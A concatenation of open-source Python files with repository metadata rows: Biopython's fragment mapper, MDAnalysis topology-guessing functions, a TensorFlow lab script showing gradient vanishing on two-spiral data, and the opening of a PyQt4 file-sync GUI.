        aligner.set(self.coords_ca, other.coords_ca)
        aligner.run()
        return aligner.get_rms()

    def __repr__(self):
        """
        Return <Fragment length=L id=ID>, where L is the fragment length
        and ID its identifier (rank in the library).
        """
        return "<Fragment length=%i id=%i>" % (self.length, self.fid)
def _make_fragment_list(pp, length):
    """
    Cut a peptide into overlapping fragments of the given length.

    A PDBException("CHAINBREAK") is raised when a residue lacks a CA atom
    or its CA atom is disordered.

    @param pp: a list of residues (part of one peptide)
    @type pp: [L{Residue}, L{Residue}, ...]
    @param length: fragment length
    @type length: int
    """
    fragments = []
    last_start = len(pp) - length
    for start in range(0, last_start + 1):
        frag = Fragment(length, -1)
        for residue in pp[start:start + length]:
            resname = residue.get_resname()
            if not residue.has_id("CA"):
                raise PDBException("CHAINBREAK")
            ca = residue["CA"]
            if ca.is_disordered():
                raise PDBException("CHAINBREAK")
            frag.add_residue(resname, ca.get_coord())
        fragments.append(frag)
    return fragments
def _map_fragment_list(flist, reflist):
    """
    Map each fragment in flist to the closest (lowest RMSD) fragment in
    reflist and return the list of matched reference fragments.

    Ties in RMSD keep the earliest library fragment.

    @param flist: list of protein fragments
    @type flist: [L{Fragment}, L{Fragment}, ...]
    @param reflist: list of reference (ie. library) fragments
    @type reflist: [L{Fragment}, L{Fragment}, ...]
    """
    mapped = []
    for frag in flist:
        best_rms = None
        best_ref = None
        for ref in reflist:
            rms = frag - ref
            if best_rms is None or rms < best_rms:
                best_rms = rms
                best_ref = ref
        mapped.append(best_ref)
    return mapped
class FragmentMapper:
    """
    Map polypeptides in a model to lists of representative fragments.

    After construction, fm[residue] returns the library L{Fragment} that
    best matches the local backbone around that residue.
    """
    def __init__(self, model, lsize=20, flength=5, fdir="."):
        """
        @param model: the model that will be mapped
        @type model: L{Model}
        @param lsize: number of fragments in the library
        @type lsize: int
        @param flength: length of fragments in the library (5 or 7)
        @type flength: int
        @param fdir: directory where the definition files are
            found (default=".")
        @type fdir: string
        """
        # Only odd fragment lengths with a central residue are supported;
        # edge = number of residues on either side of the center.
        if flength==5:
            self.edge=2
        elif flength==7:
            self.edge=3
        else:
            raise PDBException("Fragment length should be 5 or 7.")
        self.flength=flength
        self.lsize=lsize
        self.reflist=_read_fragments(lsize, flength, fdir)
        self.model=model
        # Dict mapping Residue -> best matching library Fragment.
        self.fd=self._map(self.model)

    def _map(self, model):
        """
        Build the residue-to-fragment dict for all polypeptides in model.

        @param model: the model that will be mapped
        @type model: L{Model}
        """
        ppb=PPBuilder()
        ppl=ppb.build_peptides(model)
        fd={}
        for pp in ppl:
            try:
                # make fragments
                flist=_make_fragment_list(pp, self.flength)
                # classify fragments
                mflist=_map_fragment_list(flist, self.reflist)
                for i in range(0, len(pp)):
                    res=pp[i]
                    if i<self.edge:
                        # start residues have no complete fragment
                        continue
                    elif i>=(len(pp)-self.edge):
                        # end residues have no complete fragment
                        continue
                    else:
                        # map the central residue of fragment i-edge
                        index=i-self.edge
                        assert(index>=0)
                        fd[res]=mflist[index]
            except PDBException:
                # BUGFIX: the original used `except "CHAINBREAK":` (a string
                # exception), which never matches the PDBException raised by
                # _make_fragment_list, so chain breaks escaped uncaught.
                # Funny polypeptide - skip it.
                pass
        return fd

    def has_key(self, res):
        """
        Return true if the residue was mapped to a fragment.

        @type res: L{Residue}
        """
        return self.fd.has_key(res)

    def __getitem__(self, res):
        """
        @type res: L{Residue}
        @return: fragment classification
        @rtype: L{Fragment}
        """
        return self.fd[res]
if __name__=="__main__":
    # Simple command-line driver (Python 2 print syntax):
    #     python FragmentMapper.py <pdb file>
    # Prints each residue followed by its fragment classification (if any).
    import sys
    p=PDBParser()
    s=p.get_structure("X", sys.argv[1])
    # Use the first model only.
    m=s[0]
    # Library of 10 fragments of length 5; definition files in "levitt_data".
    fm=FragmentMapper(m, 10, 5, "levitt_data")
    for r in Selection.unfold_entities(m, "R"):
        print r,
        if fm.has_key(r):
            print fm[r]
        else:
            print
| NirBenTalLab/proorigami-cde-package | cde-root/usr/lib64/python2.4/site-packages/Bio/PDB/FragmentMapper.py | Python | mit | 8,715 | [
"Biopython"
] | 6bff6a18d2873e1554fd5d115b925fffc7a28fd3737a198d13e6d2dbcf431386 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Guessing unknown Topology information --- :mod:`MDAnalysis.topology.guessers`
=============================================================================
In general `guess_atom_X` returns the guessed value for a single value,
while `guess_Xs` will work on an array of many atoms.
Example uses of guessers
------------------------
Guessing elements from atom names
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Currently, it is possible to guess elements from atom names using
:func:`guess_atom_element` (or the synonymous :func:`guess_atom_type`). This can
be done in the following manner::
import MDAnalysis as mda
from MDAnalysis.topology.guessers import guess_atom_element
from MDAnalysisTests.datafiles import PRM7
u = mda.Universe(PRM7)
print(u.atoms.names[1]) # returns the atom name H1
element = guess_atom_element(u.atoms.names[1])
print(element) # returns element H
In the above example, we take an atom named H1 and use
:func:`guess_atom_element` to guess the element hydrogen (i.e. H). It is
important to note that element guessing is not always accurate. Indeed in cases
where the atom type is not recognised, we may end up with the wrong element.
For example::
import MDAnalysis as mda
from MDAnalysis.topology.guessers import guess_atom_element
from MDAnalysisTests.datafiles import PRM19SBOPC
u = mda.Universe(PRM19SBOPC)
print(u.atoms.names[-1]) # returns the atom name EPW
element = guess_atom_element(u.atoms.names[-1])
print(element) # returns element P
Here we find that virtual site atom 'EPW' was given the element P, which
would not be an expected result. We therefore always recommend that users
carefully check the outcomes of any guessers.
In some cases, one may want to guess elements for an entire universe and add
this guess as a topology attribute. This can be done using :func:`guess_types`
in the following manner::
import MDAnalysis as mda
from MDAnalysis.topology.guessers import guess_types
from MDAnalysisTests.datafiles import PRM7
u = mda.Universe(PRM7)
guessed_elements = guess_types(u.atoms.names)
u.add_TopologyAttr('elements', guessed_elements)
print(u.atoms.elements) # returns an array of guessed elements
More information on adding topology attributes can found in the `user guide`_.
.. Links
.. _user guide: https://www.mdanalysis.org/UserGuide/examples/constructing_universe.html#Adding-topology-attributes
"""
import numpy as np
import warnings
import re
from ..lib import distances
from . import tables
def guess_masses(atom_types):
    """Guess the mass of many atoms based upon their type

    Parameters
    ----------
    atom_types
        Type of each atom

    Returns
    -------
    atom_masses : np.ndarray dtype float64
    """
    # Warn (via validate_atom_types) about any types missing from the tables.
    validate_atom_types(atom_types)
    guessed = [get_atom_mass(atom_type) for atom_type in atom_types]
    return np.array(guessed, dtype=np.float64)
def validate_atom_types(atom_types):
    """Validates the atom types based on whether they are available in our tables

    Emits a warning for every unique type that is found neither as-is nor
    uppercased in the mass tables.

    Parameters
    ----------
    atom_types
        Type of each atom

    Returns
    -------
    None

    .. versionchanged:: 0.20.0
        Try uppercase atom type name as well
    """
    for atom_type in np.unique(atom_types):
        if atom_type in tables.masses:
            continue
        if atom_type.upper() in tables.masses:
            continue
        warnings.warn("Failed to guess the mass for the following atom types: {}".format(atom_type))
def guess_types(atom_names):
    """Guess the atom type of many atoms based on atom name

    Parameters
    ----------
    atom_names
        Name of each atom

    Returns
    -------
    atom_types : np.ndarray dtype object
    """
    guessed = [guess_atom_element(atom_name) for atom_name in atom_names]
    return np.array(guessed, dtype=object)
def guess_atom_type(atomname):
    """Guess atom type from the name.

    Currently a thin wrapper: the type is simply the element, as guessed
    by :func:`guess_atom_element`.

    See Also
    --------
    :func:`guess_atom_element`
    :mod:`MDAnalysis.topology.tables`
    """
    element = guess_atom_element(atomname)
    return element
# Pre-compiled patterns used by guess_atom_element to strip digits and charges.
NUMBERS = re.compile(r'[0-9]')  # match numbers
SYMBOLS = re.compile(r'[*+-]')  # match *, +, - (charge/wildcard markers)
def guess_atom_element(atomname):
    """Guess the element of the atom from the name.

    Looks in dict to see if element is found, otherwise it uses the first
    character in the atomname. The table comes from CHARMM and AMBER atom
    types, where the first character is not sufficient to determine the atom
    type. Some GROMOS ions have also been added.

    .. Warning: The translation table is incomplete. This will probably result
                in some mistakes, but it still better than nothing!

    See Also
    --------
    :func:`guess_atom_type`
    :mod:`MDAnalysis.topology.tables`
    """
    if atomname == '':
        return ''
    try:
        return tables.atomelements[atomname.upper()]
    except KeyError:
        # strip symbols and numbers
        no_symbols = re.sub(SYMBOLS, '', atomname)
        name = re.sub(NUMBERS, '', no_symbols).upper()
        # just in case
        if name in tables.atomelements:
            return tables.atomelements[name]
        # progressively shorten the candidate until a known element matches
        while name:
            if name in tables.elements:
                return name
            if name[:-1] in tables.elements:  # try dropping the trailing char
                return name[:-1]
            if name[1:] in tables.elements:   # try dropping the leading char
                return name[1:]
            if len(name) <= 2:
                # nothing matched; fall back to the first character
                return name[0]
            name = name[:-1]  # probably element is on left not right
        # if it's numbers (name emptied out), return the digits-only remainder
        return no_symbols
def guess_bonds(atoms, coords, box=None, **kwargs):
    r"""Guess if bonds exist between two atoms based on their distance.

    Bond between two atoms is created, if the two atoms are within

    .. math::

          d < f \cdot (R_1 + R_2)

    of each other, where :math:`R_1` and :math:`R_2` are the VdW radii
    of the atoms and :math:`f` is an ad-hoc *fudge_factor*. This is
    the `same algorithm that VMD uses`_.

    Parameters
    ----------
    atoms : AtomGroup
         atoms for which bonds should be guessed
    coords : array
         coordinates of the atoms (i.e., `AtomGroup.positions)`)
    fudge_factor : float, optional
        The factor by which atoms must overlap eachother to be considered a
        bond.  Larger values will increase the number of bonds found. [0.55]
    vdwradii : dict, optional
        To supply custom vdwradii for atoms in the algorithm. Must be a dict
        of format {type:radii}. The default table of van der Waals radii is
        hard-coded as :data:`MDAnalysis.topology.tables.vdwradii`.  Any user
        defined vdwradii passed as an argument will supercede the table
        values. [``None``]
    lower_bound : float, optional
        The minimum bond length. All bonds found shorter than this length will
        be ignored. This is useful for parsing PDB with altloc records where
        atoms with altloc A and B maybe very close together and there should be
        no chemical bond between them. [0.1]
    box : array_like, optional
        Bonds are found using a distance search, if unit cell information is
        given, periodic boundary conditions will be considered in the distance
        search. [``None``]

    Returns
    -------
    list
        List of tuples suitable for use in Universe topology building.

    Warnings
    --------
    No check is done after the bonds are guessed to see if Lewis
    structure is correct. This is wrong and will burn somebody.

    Raises
    ------
    :exc:`ValueError` if inputs are malformed or `vdwradii` data is missing.

    .. _`same algorithm that VMD uses`:
       http://www.ks.uiuc.edu/Research/vmd/vmd-1.9.1/ug/node26.html

    .. versionadded:: 0.7.7
    .. versionchanged:: 0.9.0
       Updated method internally to use more :mod:`numpy`, should work
       faster.  Should also use less memory, previously scaled as
       :math:`O(n^2)`.  *vdwradii* argument now augments table list
       rather than replacing entirely.
    """
    # why not just use atom.positions?
    if len(atoms) != len(coords):
        raise ValueError("'atoms' and 'coord' must be the same length")
    fudge_factor = kwargs.get('fudge_factor', 0.55)
    vdwradii = tables.vdwradii.copy()  # so I don't permanently change it
    user_vdwradii = kwargs.get('vdwradii', None)
    if user_vdwradii:  # this should make algo use their values over defaults
        vdwradii.update(user_vdwradii)
    # Try using types, then elements
    atomtypes = atoms.types
    # check that all types have a defined vdw
    if not all(val in vdwradii for val in set(atomtypes)):
        raise ValueError(("vdw radii for types: " +
                          ", ".join([t for t in set(atomtypes) if
                                     not t in vdwradii]) +
                          ". These can be defined manually using the" +
                          " keyword 'vdwradii'"))
    lower_bound = kwargs.get('lower_bound', 0.1)
    if box is not None:
        box = np.asarray(box)
    # to speed up checking, calculate what the largest possible bond
    # atom that would warrant attention.
    # then use this to quickly mask distance results later
    max_vdw = max([vdwradii[t] for t in atomtypes])
    bonds = []
    # capped distance search: only pairs closer than 2*max_vdw are returned
    pairs, dist = distances.self_capped_distance(coords,
                                                 max_cutoff=2.0*max_vdw,
                                                 min_cutoff=lower_bound,
                                                 box=box)
    for idx, (i, j) in enumerate(pairs):
        d = (vdwradii[atomtypes[i]] + vdwradii[atomtypes[j]])*fudge_factor
        if (dist[idx] < d):
            bonds.append((atoms[i].index, atoms[j].index))
    return tuple(bonds)
def guess_angles(bonds):
    """Given a list of Bonds, find all angles that exist between atoms.

    Works by assuming that if atoms 1 & 2 are bonded, and 2 & 3 are bonded,
    then (1,2,3) must be an angle.

    Returns
    -------
    list of tuples
        List of tuples defining the angles.
        Suitable for use in u._topology

    See Also
    --------
    :meth:`guess_bonds`

    .. versionadded 0.9.0
    """
    angles_found = set()
    for b in bonds:
        for atom in b:
            other_a = b.partner(atom)  # who's my friend currently in Bond
            for other_b in atom.bonds:
                if other_b != b:  # if not the same bond I start as
                    third_a = other_b.partner(atom)
                    # canonical ordering dedups (1,2,3) vs (3,2,1)
                    desc = tuple([other_a.index, atom.index, third_a.index])
                    if desc[0] > desc[-1]:  # first index always less than last
                        desc = desc[::-1]
                    angles_found.add(desc)
    return tuple(angles_found)
def guess_dihedrals(angles):
    """Given a list of Angles, find all dihedrals that exist between atoms.

    Works by assuming that if (1,2,3) is an angle, and 3 & 4 are bonded,
    then (1,2,3,4) must be a dihedral.

    Returns
    -------
    list of tuples
        List of tuples defining the dihedrals.
        Suitable for use in u._topology

    .. versionadded 0.9.0
    """
    dihedrals_found = set()
    for b in angles:
        a_tup = tuple([a.index for a in b])  # angle as tuple of numbers
        # if searching with b[0], want tuple of (b[2], b[1], b[0], +new)
        # search the first and last atom of each angle
        for atom, prefix in zip([b.atoms[0], b.atoms[-1]],
                                [a_tup[::-1], a_tup]):
            for other_b in atom.bonds:
                if not other_b.partner(atom) in b:
                    third_a = other_b.partner(atom)
                    desc = prefix + (third_a.index,)
                    # canonical ordering so (1,2,3,4) == (4,3,2,1)
                    if desc[0] > desc[-1]:
                        desc = desc[::-1]
                    dihedrals_found.add(desc)
    return tuple(dihedrals_found)
def guess_improper_dihedrals(angles):
    """Given a list of Angles, find all improper dihedrals that exist between
    atoms.

    Works by assuming that if (1,2,3) is an angle, and 2 & 4 are bonded,
    then (2, 1, 3, 4) must be an improper dihedral.
    ie the improper dihedral is the angle between the planes formed by
    (1, 2, 3) and (1, 3, 4)

    Returns
    -------
        List of tuples defining the improper dihedrals.
        Suitable for use in u._topology

    .. versionadded 0.9.0
    """
    dihedrals_found = set()
    for b in angles:
        atom = b[1]  # select middle atom in angle
        # start of improper tuple
        a_tup = tuple([b[a].index for a in [1, 2, 0]])
        # if searching with b[1], want tuple of (b[1], b[2], b[0], +new)
        # search the first and last atom of each angle
        for other_b in atom.bonds:
            other_atom = other_b.partner(atom)
            # if this atom isn't in the angle I started with
            if not other_atom in b:
                desc = a_tup + (other_atom.index,)
                # canonical ordering for dedup
                if desc[0] > desc[-1]:
                    desc = desc[::-1]
                dihedrals_found.add(desc)
    return tuple(dihedrals_found)
def get_atom_mass(element):
    """Return the atomic mass in u for *element*.

    Masses are looked up in :data:`MDAnalysis.topology.tables.masses`.

    .. Warning:: Unknown masses are set to 0.0

    .. versionchanged:: 0.20.0
       Try uppercase atom type name as well
    """
    # Look up the element as given first; only if that misses, retry with
    # the uppercased name; anything still unknown maps to 0.0.
    try:
        return tables.masses[element]
    except KeyError:
        pass
    try:
        return tables.masses[element.upper()]
    except KeyError:
        return 0.0
def guess_atom_mass(atomname):
    """Guess a mass based on the atom name.

    :func:`guess_atom_element` is used to determine the kind of atom.

    .. warning:: Anything not recognized is simply set to 0; if you rely on
                 the masses you might want to double check.
    """
    element = guess_atom_element(atomname)
    return get_atom_mass(element)
def guess_atom_charge(atomname):
    """Guess atom charge from the name.

    .. Warning:: Not implemented; simply returns 0.
    """
    # TODO: do something slightly smarter, at least use name/element
    charge = 0.0
    return charge
def guess_aromaticities(atomgroup):
    """Guess aromaticity of atoms using RDKit

    Parameters
    ----------
    atomgroup : mda.core.groups.AtomGroup
        Atoms for which the aromaticity will be guessed

    Returns
    -------
    aromaticities : numpy.ndarray
        Array of boolean values for the aromaticity of each atom

    .. versionadded:: 2.0.0
    """
    mol = atomgroup.convert_to("RDKIT")
    # restore the original MDAnalysis atom ordering of the RDKit molecule
    ordered = sorted(mol.GetAtoms(),
                     key=lambda a: a.GetIntProp("_MDAnalysis_index"))
    flags = [atom.GetIsAromatic() for atom in ordered]
    return np.array(flags)
def guess_gasteiger_charges(atomgroup):
    """Guess Gasteiger partial charges using RDKit

    Parameters
    ----------
    atomgroup : mda.core.groups.AtomGroup
        Atoms for which the charges will be guessed

    Returns
    -------
    charges : numpy.ndarray
        Array of float values representing the charge of each atom

    .. versionadded:: 2.0.0
    """
    mol = atomgroup.convert_to("RDKIT")
    # local import keeps rdkit an optional dependency
    from rdkit.Chem.rdPartialCharges import ComputeGasteigerCharges
    ComputeGasteigerCharges(mol, throwOnParamFailure=True)
    # restore the original MDAnalysis atom ordering of the RDKit molecule
    ordered = sorted(mol.GetAtoms(),
                     key=lambda a: a.GetIntProp("_MDAnalysis_index"))
    charges = [atom.GetDoubleProp("_GasteigerCharge") for atom in ordered]
    return np.array(charges, dtype=np.float32)
| MDAnalysis/mdanalysis | package/MDAnalysis/topology/guessers.py | Python | gpl-2.0 | 16,660 | [
"Amber",
"CHARMM",
"EPW",
"GROMOS",
"MDAnalysis",
"RDKit",
"VMD"
] | c022ecdfc523aed82969428338eccfdf7beecfba2997a370030b45b69bcee6f1 |
#-*- coding: utf-8 -*-
#! /usr/bin/env python
'''
#------------------------------------------------------------
filename: lab7_runTFcheckGradientVanishing_spiraldata.py
To check Gradient Vanishing problem in
A Multi-Hidden Layers Fully Connected Neural Network.
This example data set is using two class spiral data
written by Jaewook Kang @ Jan 2018
#------------------------------------------------------------
'''
from os import getcwd
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from pandas import DataFrame
from sklearn import metrics
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import learn_io
# reading data set from csv file ==========================
xsize = 2  # number of input features (x/y coordinate of a spiral point)
ysize = 2  # number of output classes (one-hot encoded)
data = pd.read_csv('./data/twospirals_N5000.csv')
data.columns = ['xdata1', 'xdata2', 'tdata']
# shuffle rows so minibatches are not ordered by class
permutation_index = np.random.permutation(data.index)
permutated_data = data.reindex(permutation_index)
permutated_data.columns = ['xdata1', 'xdata2', 'tdata']
x_data = np.zeros([permutated_data.xdata1.size, xsize])
x_data[:, 0] = permutated_data.xdata1.values
x_data[:, 1] = permutated_data.xdata2.values
t_data = np.zeros([permutated_data.tdata.size, ysize])
t_data[:, 0] = permutated_data.tdata.values
# one-hot second column: labels are 0/1 ints, so bitwise ~t + 2 maps 0->1, 1->0
t_data[:, 1] = np.invert(permutated_data.tdata.values) + 2
total_size = permutated_data.xdata1.size
training_size = int(np.floor(permutated_data.xdata1.size * 0.8))  # 80/20 split
validation_size = total_size - training_size
# data dividing
x_training_data = x_data[0:training_size, :]
t_training_data = t_data[0:training_size, :]
# NOTE(review): the -1 end index silently drops the final sample;
# [training_size:] would keep it — confirm whether that was intended.
x_validation_data = x_data[training_size:-1, :]
t_validation_data = t_data[training_size:-1, :]
# #data plot
hfig1 = plt.figure(1, figsize=[10, 10])
# plot the (unshuffled) data: first half of the rows is class 0, second half class 1
plt.scatter(data.xdata1.values[0:int(data.xdata1.size/2)],
            data.xdata2.values[0:int(data.xdata1.size/2)],
            color='b', label='class0')
plt.scatter(data.xdata1.values[int(data.xdata1.size/2)+2:-1],
            data.xdata2.values[int(data.xdata1.size/2)+2:-1],
            color='r', label='class1')
plt.title('Two Spiral data Example')
plt.legend()
# configure training parameters =====================================
learning_rate = 1E-5
training_epochs = 5
batch_size = 100
display_step = 1  # report error rates every `display_step` epochs
total_batch = int(training_size / batch_size)
# computational TF graph construction ================================
# Network Parameters
n_hidden_1 = 10  # 1st layer number of neurons
n_hidden_2 = 7   # 2nd layer number of neurons
n_hidden_3 = 7   # 3rd layer number of neurons
n_hidden_4 = 4   # 4rd layer number of neurons
n_hidden_5 = 4   # 5rd layer number of neurons
num_input = xsize     # two-dimensional input X = [1x2]
num_classes = ysize   # 2 class
#-------------------------------
# tf Graph input (None = variable batch dimension)
X = tf.placeholder(tf.float32, [None, num_input])
Y = tf.placeholder(tf.float32, [None, num_classes])
# Store layers weight & bias, randomly initialized from a standard normal
weights = {
    'h1': tf.Variable(tf.random_normal([num_input, n_hidden_1])),
    'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
    'h3': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),
    'h4': tf.Variable(tf.random_normal([n_hidden_3, n_hidden_4])),
    'h5': tf.Variable(tf.random_normal([n_hidden_4, n_hidden_5])),
    'out': tf.Variable(tf.random_normal([n_hidden_5, num_classes]))
}
biases = {
    'b1': tf.Variable(tf.random_normal([n_hidden_1])),
    'b2': tf.Variable(tf.random_normal([n_hidden_2])),
    'b3': tf.Variable(tf.random_normal([n_hidden_3])),
    'b4': tf.Variable(tf.random_normal([n_hidden_4])),
    'b5': tf.Variable(tf.random_normal([n_hidden_5])),
    'out': tf.Variable(tf.random_normal([num_classes]))
}
# Create model
def neural_net(x):
    """Forward pass of the 5-hidden-layer fully connected network.

    Each hidden layer applies an affine transform followed by a softmax
    activation (deliberately chosen in this lab to provoke vanishing
    gradients); the output layer returns raw logits.
    """
    activation = x
    for layer in range(1, 6):
        w = weights['h%d' % layer]
        b = biases['b%d' % layer]
        activation = tf.nn.softmax(tf.add(tf.matmul(activation, w), b))
    # Output fully connected layer with a neuron for each class (no activation)
    out_layer = tf.matmul(activation, weights['out']) + biases['out']
    return out_layer
# Construct model
logits = neural_net(X)
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)
#optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Evaluate model
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# per-epoch error-rate history, filled in during training
errRateTraining = np.zeros(training_epochs)
errRateValidation = np.zeros(training_epochs)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
# for visualization of vanishing gradient problem:
# symbolic gradients of the loss w.r.t. each hidden layer's weight matrix
grad_wrt_weight_layer1_tensor = tf.gradients(cost, weights['h1'],
                                             name='grad_wrt_weight_layer1')
grad_wrt_weight_layer2_tensor = tf.gradients(cost, weights['h2'],
                                             name='grad_wrt_weight_layer2')
grad_wrt_weight_layer3_tensor = tf.gradients(cost, weights['h3'],
                                             name='grad_wrt_weight_layer3')
grad_wrt_weight_layer4_tensor = tf.gradients(cost, weights['h4'],
                                             name='grad_wrt_weight_layer4')
grad_wrt_weight_layer5_tensor = tf.gradients(cost, weights['h5'],
                                             name='grad_wrt_weight_layer5')
# per-minibatch mean gradient, collected only during the final epoch
grad_wrt_weight_layer1_iter = np.zeros([total_batch, 1])
grad_wrt_weight_layer2_iter = np.zeros([total_batch, 1])
grad_wrt_weight_layer3_iter = np.zeros([total_batch, 1])
grad_wrt_weight_layer4_iter = np.zeros([total_batch, 1])
grad_wrt_weight_layer5_iter = np.zeros([total_batch, 1])
# Start training ===============================================
with tf.Session() as sess:
    # Run the initializer
    sess.run(init)
    print("--------------------------------------------")
    for epoch in range(training_epochs):
        avg_cost = 0.
        for i in range(total_batch):
            data_start_index = i * batch_size
            data_end_index = (i + 1) * batch_size
            # feed traing data --------------------------
            batch_xs = x_training_data[data_start_index:data_end_index, :]
            batch_ts = t_training_data[data_start_index:data_end_index, :]
            #----------------------------------------------
            # Run optimization op (backprop) and cost op (to get loss value)
            # feedign training data
            _, local_batch_cost = sess.run([optimizer, cost],
                                           feed_dict={X: batch_xs, Y: batch_ts})
            if epoch == training_epochs - 1:
                # print ('Gradient calculation to see gradient vanishing problem')
                # NOTE(review): each of these sess.run calls also executes
                # `optimizer`, so every batch in the last epoch applies five
                # extra gradient-descent updates — confirm this is intended.
                _, grad_wrt_weight_layer1 = sess.run([optimizer, grad_wrt_weight_layer1_tensor],
                                                     feed_dict={X: batch_xs, Y: batch_ts})
                _, grad_wrt_weight_layer2 = sess.run([optimizer, grad_wrt_weight_layer2_tensor],
                                                     feed_dict={X: batch_xs, Y: batch_ts})
                _, grad_wrt_weight_layer3 = sess.run([optimizer, grad_wrt_weight_layer3_tensor],
                                                     feed_dict={X: batch_xs, Y: batch_ts})
                _, grad_wrt_weight_layer4 = sess.run([optimizer, grad_wrt_weight_layer4_tensor],
                                                     feed_dict={X: batch_xs, Y: batch_ts})
                _, grad_wrt_weight_layer5 = sess.run([optimizer, grad_wrt_weight_layer5_tensor],
                                                     feed_dict={X: batch_xs, Y: batch_ts})
                # tf.gradients returns a list; drop the leading list axis
                grad_wrt_weight_layer1 = np.array(grad_wrt_weight_layer1)
                grad_wrt_weight_layer2 = np.array(grad_wrt_weight_layer2)
                grad_wrt_weight_layer3 = np.array(grad_wrt_weight_layer3)
                grad_wrt_weight_layer4 = np.array(grad_wrt_weight_layer4)
                grad_wrt_weight_layer5 = np.array(grad_wrt_weight_layer5)
                grad_wrt_weight_layer1 = grad_wrt_weight_layer1.reshape(grad_wrt_weight_layer1.shape[1],
                                                                        grad_wrt_weight_layer1.shape[2])
                grad_wrt_weight_layer2 = grad_wrt_weight_layer2.reshape(grad_wrt_weight_layer2.shape[1],
                                                                        grad_wrt_weight_layer2.shape[2])
                grad_wrt_weight_layer3 = grad_wrt_weight_layer3.reshape(grad_wrt_weight_layer3.shape[1],
                                                                        grad_wrt_weight_layer3.shape[2])
                grad_wrt_weight_layer4 = grad_wrt_weight_layer4.reshape(grad_wrt_weight_layer4.shape[1],
                                                                        grad_wrt_weight_layer4.shape[2])
                grad_wrt_weight_layer5 = grad_wrt_weight_layer5.reshape(grad_wrt_weight_layer5.shape[1],
                                                                        grad_wrt_weight_layer5.shape[2])
                # record the mean gradient magnitude of this minibatch
                grad_wrt_weight_layer1_iter[i] = grad_wrt_weight_layer1.mean()
                grad_wrt_weight_layer2_iter[i] = grad_wrt_weight_layer2.mean()
                grad_wrt_weight_layer3_iter[i] = grad_wrt_weight_layer3.mean()
                grad_wrt_weight_layer4_iter[i] = grad_wrt_weight_layer4.mean()
                grad_wrt_weight_layer5_iter[i] = grad_wrt_weight_layer5.mean()
            # Compute average loss
            avg_cost += local_batch_cost / total_batch
            # print ("At %d-th batch in %d-epoch, avg_cost = %f" % (i,epoch,avg_cost) )
        # Display logs per epoch step
        if display_step == 0:
            continue
        elif (epoch + 1) % display_step == 0:
            # print("Iteration:", '%04d' % (epoch + 1), "cost=", "{:.9f}".format(avg_cost))
            # evaluate error rate on the FULL training/validation sets
            batch_train_xs = x_training_data
            batch_train_ys = t_training_data
            batch_valid_xs = x_validation_data
            batch_valid_ys = t_validation_data
            errRateTraining[epoch] = 1.0 - accuracy.eval({X: batch_train_xs,
                                                          Y: batch_train_ys}, session=sess)
            errRateValidation[epoch] = 1.0 - accuracy.eval({X: batch_valid_xs,
                                                            Y: batch_valid_ys}, session=sess)
            print("Training set Err rate: %s" % errRateTraining[epoch])
            print("Validation set Err rate: %s" % errRateValidation[epoch])
    print("--------------------------------------------")
    print("Optimization Finished!")
# Training result visualization ===============================================
# Plot the per-minibatch mean gradient of layers 1/4/5 from the final epoch;
# layer 1 (earliest) flat-lining near zero demonstrates gradient vanishing.
hfig2 = plt.figure(2, figsize=(10, 10))
batch_index = np.array([elem for elem in range(total_batch)])
plt.plot(batch_index, grad_wrt_weight_layer1_iter, label='layer1', color='b', marker='o')
plt.plot(batch_index, grad_wrt_weight_layer4_iter, label='layer4', color='y', marker='o')
plt.plot(batch_index, grad_wrt_weight_layer5_iter, label='layer5', color='r', marker='o')
plt.legend()
plt.title('Weight Gradient over minibatch iter @ training epoch = %s' % training_epochs)
plt.xlabel('minibatch iter')
plt.ylabel('Weight Gradient')
plt.show() | jwkanggist/EveryBodyTensorFlow | lab7_runTFcheckGradientVanishing_spiraldata.py | Python | unlicense | 11,985 | [
"NEURON"
] | b2854dfc14464ada2aea939898feab72dbe48137272f19cf0da0a4b65f8dacbd |
import sys, os
import pickle
import threading
from PyQt4.QtGui import *
from PyQt4.QtCore import *
#Contains File Actions
from sync import *
#Contain Variables for file action, dock checkboxes and objects
from env import *
#Contains Filetype Variables
from env2 import *
#Contain Progress Related Variables
from env_progress import *
#Contains disk detail creation function
from disk_detail import *
#Contains File types list creation function
from make_dock2 import *
#Location define Window
from set_dict import *
#Log Window
from log import *
#StyleSheet
from style1 import *
from copy_confirm import *
from fetching import *
from fetch import *
from wrapper import *
"""
Signals for progress function update
"""
class signal(QObject):
    """Qt signals used to marshal UI updates from the worker threads
    back onto the GUI thread (handlers connected in centre.__init__)."""
    text_browser = pyqtSignal()  # Text Browser Signal
    prog_bar = pyqtSignal()      # ProgressBar Signal
    prog_lab = pyqtSignal()      # Progress Label Signal
    stat_bar = pyqtSignal()      # StatusBar Signal
